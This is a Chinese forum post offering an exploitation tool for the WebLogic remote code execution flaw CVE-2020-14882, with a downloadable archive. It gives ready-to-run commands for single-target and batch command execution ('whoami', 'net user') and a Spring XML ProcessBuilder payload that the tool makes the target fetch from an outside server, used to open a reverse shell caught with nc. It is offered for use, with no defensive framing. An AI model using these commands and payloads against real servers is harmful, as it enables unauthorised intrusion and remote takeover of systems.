请选择 进入手机版 | 继续访问电脑版
查看: 1596|回复: 0

Weblogic远程代码执行-CVE-2020-14882

[复制链接]
  • TA的每日心情

    5 天前
  • 签到天数: 928 天

    [LV.10]以坛为家III

    发表于 2020-11-3 21:09:33 | 显示全部楼层 |阅读模式
    CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。
    需要模块:requests、http.client

    1.png

    功能一:命令回显
    1. python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "net user"
    复制代码

    2.png

    1. python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "whoami"
    复制代码

    3.png

    功能二:批量命令回显
    1. python3 CVE-2020-14882_ALL.py -f target.txt -c "whoami"
    复制代码


    target.txt 格式:http://x.x.x.x:xx,一行一个
    4.png

    功能三:外置xml文件无回显命令执行
    1、Linux反弹shell为例,编辑好poc.xml文件,开启python监听。

    1. <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    2.   <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    3.     <constructor-arg>
    4.       <list>
    5.         <value>cmd</value>
    6.       </list>
    7.     </constructor-arg>
    8.   </bean>
    9. </beans>
    复制代码


    开启python监听
    5.png

    nc开启监听
    6.png

    2、使用-x选项指定xml文件路径,发送payload。

    1. python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml
    复制代码

    7.png

    3、成功接收shell
    8.png

    CVE-2020-14882_ALL-master.zip (460.08 KB, 下载次数: 1, 售价: 3 i币)
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表